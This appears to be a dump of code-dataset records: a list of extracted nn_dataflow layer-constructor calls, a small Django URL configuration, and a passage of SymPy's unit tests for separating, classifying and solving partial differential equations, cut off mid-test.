'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((32, 31, 32, 54), 'nn_dataflow.core.PoolingLayer', 'PoolingLayer', ({(32, 44, 32, 46): '(64)', (32, 48, 32, 49): '(7)', (32, 51, 32, 53): '(32)'}, {}), '(64, 7, 32)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((33, 31, 33, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(33, 39, 33, 41): '(64)', (33, 43, 33, 47): '(1000)', (33, 49, 33, 50): '(7)'}, {}), '(64, 1000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((38, 32, 38, 49), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(38, 43, 38, 44): '(3)', (38, 46, 38, 48): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((56, 32, 56, 
49), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(56, 43, 56, 44): '(3)', (56, 46, 56, 48): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((64, 31, 64, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(64, 39, 64, 41): '(64)', (64, 43, 64, 47): '(2000)', (64, 49, 64, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((65, 31, 65, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(65, 39, 65, 43): '(3000)', (65, 45, 65, 49): '(1000)'}, {}), '(3000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((66, 31, 66, 55), 'nn_dataflow.core.EltwiseLayer', 'EltwiseLayer', ({(66, 44, 66, 48): '(1000)', (66, 50, 66, 51): '(1)', (66, 53, 66, 54): '(2)'}, {}), '(1000, 1, 2)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((67, 31, 67, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(67, 39, 67, 43): '(1000)', (67, 45, 67, 49): '(1000)'}, {}), '(1000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((73, 32, 73, 50), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(73, 43, 73, 44): '(3)', (73, 46, 73, 49): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((75, 26, 75, 50), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(75, 36, 75, 37): '(3)', (75, 39, 75, 41): '(64)', (75, 43, 75, 46): '(224)', (75, 48, 75, 49): '(3)'}, {}), '(3, 64, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((89, 32, 89, 50), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(89, 43, 89, 44): '(3)', (89, 46, 89, 49): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((91, 26, 91, 50), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(91, 36, 91, 37): '(3)', (91, 39, 91, 41): '(64)', (91, 43, 91, 46): '(224)', (91, 48, 91, 49): '(3)'}, {}), '(3, 64, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((98, 32, 98, 50), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(98, 43, 98, 44): '(3)', (98, 46, 98, 49): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((106, 32, 106, 50), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(106, 43, 106, 44): '(3)', (106, 46, 106, 49): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((107, 26, 107, 50), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(107, 36, 107, 37): '(3)', (107, 39, 107, 41): '(64)', (107, 43, 107, 46): '(224)', (107, 48, 107, 49): '(3)'}, {}), '(3, 64, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((125, 26, 125, 52), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(125, 36, 125, 38): '(64)', (125, 40, 125, 43): '(128)', (125, 45, 125, 48): '(224)', (125, 50, 125, 51): '(3)'}, {}), '(64, 128, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((136, 35, 136, 52), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(136, 46, 
136, 47): '(3)', (136, 49, 136, 51): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((142, 35, 142, 58), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(142, 46, 142, 47): '(5)', (142, 49, 142, 57): '(16, 20)'}, {}), '(5, (16, 20))', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((154, 30, 154, 47), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(154, 41, 154, 42): '(3)', (154, 44, 154, 46): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((169, 31, 169, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(169, 39, 169, 41): '(64)', (169, 43, 169, 47): '(2000)', (169, 49, 169, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((170, 31, 170, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(170, 39, 170, 43): '(3000)', (170, 45, 170, 49): '(1000)'}, {}), '(3000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((182, 31, 182, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(182, 41, 182, 42): '(3)', (182, 44, 182, 45): '(3)', (182, 47, 182, 50): '(224)', (182, 52, 182, 53): '(1)'}, {}), '(3, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((198, 35, 198, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(198, 46, 198, 47): '(3)', (198, 49, 198, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((200, 30, 200, 53), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(200, 40, 200, 41): '(6)', (200, 43, 200, 44): '(3)', (200, 46, 200, 49): '(224)', (200, 51, 200, 52): '(1)'}, {}), '(6, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((208, 35, 208, 51), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(208, 46, 208, 47): '(3)', (208, 49, 208, 50): '(3)'}, {}), '(3, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((214, 31, 214, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(214, 39, 214, 41): '(64)', (214, 43, 214, 47): '(2000)', (214, 49, 214, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((215, 31, 215, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(215, 39, 215, 43): '(3000)', (215, 45, 215, 49): '(1000)'}, {}), '(3000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((216, 31, 216, 55), 'nn_dataflow.core.EltwiseLayer', 'EltwiseLayer', ({(216, 44, 216, 48): '(1000)', (216, 50, 216, 51): '(1)', (216, 53, 216, 54): '(2)'}, {}), '(1000, 1, 2)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((217, 31, 217, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(217, 39, 217, 43): '(1000)', (217, 45, 217, 49): '(1000)'}, {}), '(1000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((236, 31, 236, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(236, 39, 236, 41): '(64)', (236, 43, 236, 47): '(2000)', (236, 49, 236, 50): '(7)'}, {}), '(64, 2000, 
7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((248, 31, 248, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(248, 41, 248, 42): '(3)', (248, 44, 248, 45): '(3)', (248, 47, 248, 50): '(224)', (248, 52, 248, 53): '(1)'}, {}), '(3, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((250, 31, 250, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(250, 41, 250, 42): '(6)', (250, 44, 250, 45): '(4)', (250, 47, 250, 50): '(224)', (250, 52, 250, 53): '(1)'}, {}), '(6, 4, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((260, 31, 260, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(260, 41, 260, 42): '(3)', (260, 44, 260, 45): '(3)', (260, 47, 260, 50): '(224)', (260, 52, 260, 53): '(1)'}, {}), '(3, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((262, 31, 262, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(262, 41, 262, 42): '(6)', (262, 44, 262, 45): '(4)', (262, 47, 262, 50): '(224)', (262, 52, 262, 53): '(1)'}, {}), '(6, 4, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((272, 35, 272, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(272, 46, 272, 47): '(3)', (272, 49, 272, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((274, 31, 274, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(274, 41, 274, 42): '(3)', (274, 44, 274, 45): '(3)', (274, 47, 274, 50): '(224)', (274, 52, 274, 53): '(1)'}, {}), '(3, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((275, 31, 275, 55), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(275, 41, 275, 43): '(67)', (275, 45, 275, 46): '(3)', (275, 48, 275, 51): '(224)', (275, 53, 275, 54): '(1)'}, {}), '(67, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((276, 31, 276, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(276, 41, 276, 42): '(6)', (276, 44, 276, 45): '(3)', (276, 47, 276, 50): '(224)', (276, 52, 276, 53): '(1)'}, {}), '(6, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((289, 31, 289, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(289, 39, 289, 41): '(64)', (289, 43, 289, 47): '(2000)', (289, 49, 289, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((298, 35, 298, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(298, 46, 298, 47): '(3)', (298, 49, 298, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((301, 35, 301, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(301, 46, 301, 47): '(3)', (301, 49, 301, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((311, 31, 311, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(311, 39, 311, 41): '(64)', (311, 43, 311, 47): '(2000)', (311, 49, 311, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, 
PoolingLayer, EltwiseLayer\n'), ((320, 32, 320, 50), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(320, 43, 320, 44): '(3)', (320, 46, 320, 49): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((322, 26, 322, 49), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(322, 36, 322, 37): '(3)', (322, 39, 322, 40): '(4)', (322, 42, 322, 45): '(224)', (322, 47, 322, 48): '(1)'}, {}), '(3, 4, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((325, 31, 325, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(325, 39, 325, 41): '(64)', (325, 43, 325, 47): '(2000)', (325, 49, 325, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((327, 31, 327, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(327, 39, 327, 43): '(3000)', (327, 45, 327, 49): '(1000)'}, {}), '(3000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((329, 31, 329, 55), 'nn_dataflow.core.EltwiseLayer', 'EltwiseLayer', ({(329, 44, 329, 48): '(1000)', (329, 50, 329, 51): '(1)', (329, 53, 329, 54): '(2)'}, {}), '(1000, 1, 2)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((331, 31, 331, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(331, 39, 331, 43): '(1000)', (331, 45, 331, 49): '(1000)'}, {}), '(1000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((344, 32, 344, 50), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(344, 43, 344, 44): '(3)', (344, 46, 344, 49): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((351, 35, 351, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(351, 46, 351, 47): '(3)', (351, 49, 351, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((357, 35, 357, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(357, 46, 357, 47): '(3)', (357, 49, 357, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((362, 35, 362, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(362, 46, 362, 47): '(3)', (362, 49, 362, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((49, 36, 49, 48), 'nn_dataflow.core.Layer', 'Layer', ({(49, 42, 49, 43): '(3)', (49, 45, 49, 47): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((51, 36, 51, 58), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(51, 46, 51, 47): '(3)', (51, 49, 51, 50): '(8)', (51, 52, 51, 54): '(24)', (51, 56, 51, 57): '(3)'}, {}), '(3, 8, 24, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((58, 36, 58, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(58, 47, 58, 48): '(3)', (58, 50, 58, 52): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((77, 30, 77, 56), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(77, 40, 77, 42): '(64)', (77, 44, 77, 47): '(128)', (77, 49, 
77, 52): '(224)', (77, 54, 77, 55): '(3)'}, {}), '(64, 128, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((84, 30, 84, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(84, 40, 84, 41): '(3)', (84, 43, 84, 45): '(64)', (84, 47, 84, 50): '(224)', (84, 52, 84, 53): '(3)'}, {}), '(3, 64, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((93, 30, 93, 53), 'nn_dataflow.core.PoolingLayer', 'PoolingLayer', ({(93, 43, 93, 45): '(64)', (93, 47, 93, 48): '(7)', (93, 50, 93, 52): '(32)'}, {}), '(64, 7, 32)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((111, 30, 111, 52), 'nn_dataflow.core.PoolingLayer', 'PoolingLayer', ({(111, 43, 111, 45): '(64)', (111, 47, 111, 48): '(7)', (111, 50, 111, 51): '(2)'}, {}), '(64, 7, 2)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((115, 30, 115, 56), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(115, 40, 115, 42): '(64)', (115, 44, 115, 47): '(128)', (115, 49, 115, 52): '(220)', (115, 54, 115, 55): '(3)'}, {}), '(64, 128, 220, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((119, 30, 119, 53), 'nn_dataflow.core.PoolingLayer', 'PoolingLayer', ({(119, 43, 119, 45): '(32)', (119, 47, 119, 48): '(7)', (119, 50, 119, 52): '(32)'}, {}), '(32, 7, 32)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((122, 30, 122, 56), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(122, 40, 122, 42): '(32)', (122, 44, 122, 47): '(128)', (122, 49, 122, 52): '(224)', (122, 54, 122, 55): '(3)'}, {}), '(32, 128, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((129, 30, 129, 54), 'nn_dataflow.core.PoolingLayer', 'PoolingLayer', ({(129, 43, 129, 46): '(128)', (129, 48, 129, 49): '(7)', (129, 51, 129, 53): '(32)'}, {}), '(128, 7, 32)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((156, 34, 156, 51), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(156, 45, 156, 46): '(3)', (156, 48, 156, 50): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((163, 34, 163, 46), 'nn_dataflow.core.Layer', 'Layer', ({(163, 40, 163, 41): '(3)', (163, 43, 163, 45): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((165, 34, 165, 56), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(165, 44, 165, 45): '(3)', (165, 47, 165, 48): '(8)', (165, 50, 165, 52): '(24)', (165, 54, 165, 55): '(3)'}, {}), '(3, 8, 24, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n')] |
Jingil-Integrated-Management/JIM_backend | apps/division/urls.py | f0e7860d57eddaee034531a52ab91d6715d12c18 | from django.urls import path
from .views import DivisionListCreateAPIView, DivisionRetrieveUpdateDestroyAPIView, MainDivisionListAPIView
urlpatterns = [
path('division/', DivisionListCreateAPIView.as_view()),
path('division/<division_pk>', DivisionRetrieveUpdateDestroyAPIView.as_view()),
path('division/main/', MainDivisionListAPIView.as_view()),
]
| [] |
nashalex/sympy | sympy/solvers/tests/test_pde.py | aec3e6512be46f0558f5dbcf2b4d723496c91649 | from sympy import (Derivative as D, Eq, exp, sin,
Function, Symbol, symbols, cos, log)
from sympy.core import S
from sympy.solvers.pde import (pde_separate, pde_separate_add, pde_separate_mul,
pdsolve, classify_pde, checkpdesol)
from sympy.testing.pytest import raises
a, b, c, x, y = symbols('a b c x y')
def test_pde_separate_add():
x, y, z, t = symbols("x,y,z,t")
F, T, X, Y, Z, u = map(Function, 'FTXYZu')
eq = Eq(D(u(x, t), x), D(u(x, t), t)*exp(u(x, t)))
res = pde_separate_add(eq, u(x, t), [X(x), T(t)])
assert res == [D(X(x), x)*exp(-X(x)), D(T(t), t)*exp(T(t))]
def test_pde_separate():
x, y, z, t = symbols("x,y,z,t")
F, T, X, Y, Z, u = map(Function, 'FTXYZu')
eq = Eq(D(u(x, t), x), D(u(x, t), t)*exp(u(x, t)))
raises(ValueError, lambda: pde_separate(eq, u(x, t), [X(x), T(t)], 'div'))
def test_pde_separate_mul():
x, y, z, t = symbols("x,y,z,t")
c = Symbol("C", real=True)
Phi = Function('Phi')
F, R, T, X, Y, Z, u = map(Function, 'FRTXYZu')
r, theta, z = symbols('r,theta,z')
# Something simple :)
eq = Eq(D(F(x, y, z), x) + D(F(x, y, z), y) + D(F(x, y, z), z), 0)
# Duplicate arguments in functions
raises(
ValueError, lambda: pde_separate_mul(eq, F(x, y, z), [X(x), u(z, z)]))
# Wrong number of arguments
raises(ValueError, lambda: pde_separate_mul(eq, F(x, y, z), [X(x), Y(y)]))
# Wrong variables: [x, y] -> [x, z]
raises(
ValueError, lambda: pde_separate_mul(eq, F(x, y, z), [X(t), Y(x, y)]))
assert pde_separate_mul(eq, F(x, y, z), [Y(y), u(x, z)]) == \
[D(Y(y), y)/Y(y), -D(u(x, z), x)/u(x, z) - D(u(x, z), z)/u(x, z)]
assert pde_separate_mul(eq, F(x, y, z), [X(x), Y(y), Z(z)]) == \
[D(X(x), x)/X(x), -D(Z(z), z)/Z(z) - D(Y(y), y)/Y(y)]
# wave equation
wave = Eq(D(u(x, t), t, t), c**2*D(u(x, t), x, x))
res = pde_separate_mul(wave, u(x, t), [X(x), T(t)])
assert res == [D(X(x), x, x)/X(x), D(T(t), t, t)/(c**2*T(t))]
# Laplace equation in cylindrical coords
eq = Eq(1/r * D(Phi(r, theta, z), r) + D(Phi(r, theta, z), r, 2) +
1/r**2 * D(Phi(r, theta, z), theta, 2) + D(Phi(r, theta, z), z, 2), 0)
# Separate z
res = pde_separate_mul(eq, Phi(r, theta, z), [Z(z), u(theta, r)])
assert res == [D(Z(z), z, z)/Z(z),
-D(u(theta, r), r, r)/u(theta, r) -
D(u(theta, r), r)/(r*u(theta, r)) -
D(u(theta, r), theta, theta)/(r**2*u(theta, r))]
    # Let's use the result to create a new equation...
eq = Eq(res[1], c)
# ...and separate theta...
res = pde_separate_mul(eq, u(theta, r), [T(theta), R(r)])
assert res == [D(T(theta), theta, theta)/T(theta),
-r*D(R(r), r)/R(r) - r**2*D(R(r), r, r)/R(r) - c*r**2]
# ...or r...
res = pde_separate_mul(eq, u(theta, r), [R(r), T(theta)])
assert res == [r*D(R(r), r)/R(r) + r**2*D(R(r), r, r)/R(r) + c*r**2,
-D(T(theta), theta, theta)/T(theta)]
def test_issue_11726():
x, t = symbols("x t")
f = symbols("f", cls=Function)
X, T = symbols("X T", cls=Function)
u = f(x, t)
eq = u.diff(x, 2) - u.diff(t, 2)
res = pde_separate(eq, u, [T(x), X(t)])
assert res == [D(T(x), x, x)/T(x),D(X(t), t, t)/X(t)]
def test_pde_classify():
    # When more hints are added, add tests for classifying them here.
f = Function('f')
eq1 = a*f(x,y) + b*f(x,y).diff(x) + c*f(x,y).diff(y)
eq2 = 3*f(x,y) + 2*f(x,y).diff(x) + f(x,y).diff(y)
eq3 = a*f(x,y) + b*f(x,y).diff(x) + 2*f(x,y).diff(y)
eq4 = x*f(x,y) + f(x,y).diff(x) + 3*f(x,y).diff(y)
eq5 = x**2*f(x,y) + x*f(x,y).diff(x) + x*y*f(x,y).diff(y)
eq6 = y*x**2*f(x,y) + y*f(x,y).diff(x) + f(x,y).diff(y)
for eq in [eq1, eq2, eq3]:
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
for eq in [eq4, eq5, eq6]:
assert classify_pde(eq) == ('1st_linear_variable_coeff',)
def test_checkpdesol():
f, F = map(Function, ['f', 'F'])
eq1 = a*f(x,y) + b*f(x,y).diff(x) + c*f(x,y).diff(y)
eq2 = 3*f(x,y) + 2*f(x,y).diff(x) + f(x,y).diff(y)
eq3 = a*f(x,y) + b*f(x,y).diff(x) + 2*f(x,y).diff(y)
for eq in [eq1, eq2, eq3]:
assert checkpdesol(eq, pdsolve(eq))[0]
eq4 = x*f(x,y) + f(x,y).diff(x) + 3*f(x,y).diff(y)
eq5 = 2*f(x,y) + 1*f(x,y).diff(x) + 3*f(x,y).diff(y)
eq6 = f(x,y) + 1*f(x,y).diff(x) + 3*f(x,y).diff(y)
assert checkpdesol(eq4, [pdsolve(eq5), pdsolve(eq6)]) == [
(False, (x - 2)*F(3*x - y)*exp(-x/S(5) - 3*y/S(5))),
(False, (x - 1)*F(3*x - y)*exp(-x/S(10) - 3*y/S(10)))]
for eq in [eq4, eq5, eq6]:
assert checkpdesol(eq, pdsolve(eq))[0]
sol = pdsolve(eq4)
sol4 = Eq(sol.lhs - sol.rhs, 0)
raises(NotImplementedError, lambda:
checkpdesol(eq4, sol4, solve_for_func=False))
def test_solvefun():
f, F, G, H = map(Function, ['f', 'F', 'G', 'H'])
eq1 = f(x,y) + f(x,y).diff(x) + f(x,y).diff(y)
assert pdsolve(eq1) == Eq(f(x, y), F(x - y)*exp(-x/2 - y/2))
assert pdsolve(eq1, solvefun=G) == Eq(f(x, y), G(x - y)*exp(-x/2 - y/2))
assert pdsolve(eq1, solvefun=H) == Eq(f(x, y), H(x - y)*exp(-x/2 - y/2))
def test_pde_1st_linear_constant_coeff_homogeneous():
f, F = map(Function, ['f', 'F'])
u = f(x, y)
eq = 2*u + u.diff(x) + u.diff(y)
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
sol = pdsolve(eq)
assert sol == Eq(u, F(x - y)*exp(-x - y))
assert checkpdesol(eq, sol)[0]
eq = 4 + (3*u.diff(x)/u) + (2*u.diff(y)/u)
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
sol = pdsolve(eq)
assert sol == Eq(u, F(2*x - 3*y)*exp(-S(12)*x/13 - S(8)*y/13))
assert checkpdesol(eq, sol)[0]
eq = u + (6*u.diff(x)) + (7*u.diff(y))
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
sol = pdsolve(eq)
assert sol == Eq(u, F(7*x - 6*y)*exp(-6*x/S(85) - 7*y/S(85)))
assert checkpdesol(eq, sol)[0]
eq = a*u + b*u.diff(x) + c*u.diff(y)
sol = pdsolve(eq)
assert checkpdesol(eq, sol)[0]
def test_pde_1st_linear_constant_coeff():
f, F = map(Function, ['f', 'F'])
u = f(x,y)
eq = -2*u.diff(x) + 4*u.diff(y) + 5*u - exp(x + 3*y)
sol = pdsolve(eq)
assert sol == Eq(f(x,y),
(F(4*x + 2*y)*exp(x/2) + exp(x + 4*y)/15)*exp(-y))
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = (u.diff(x)/u) + (u.diff(y)/u) + 1 - (exp(x + y)/u)
sol = pdsolve(eq)
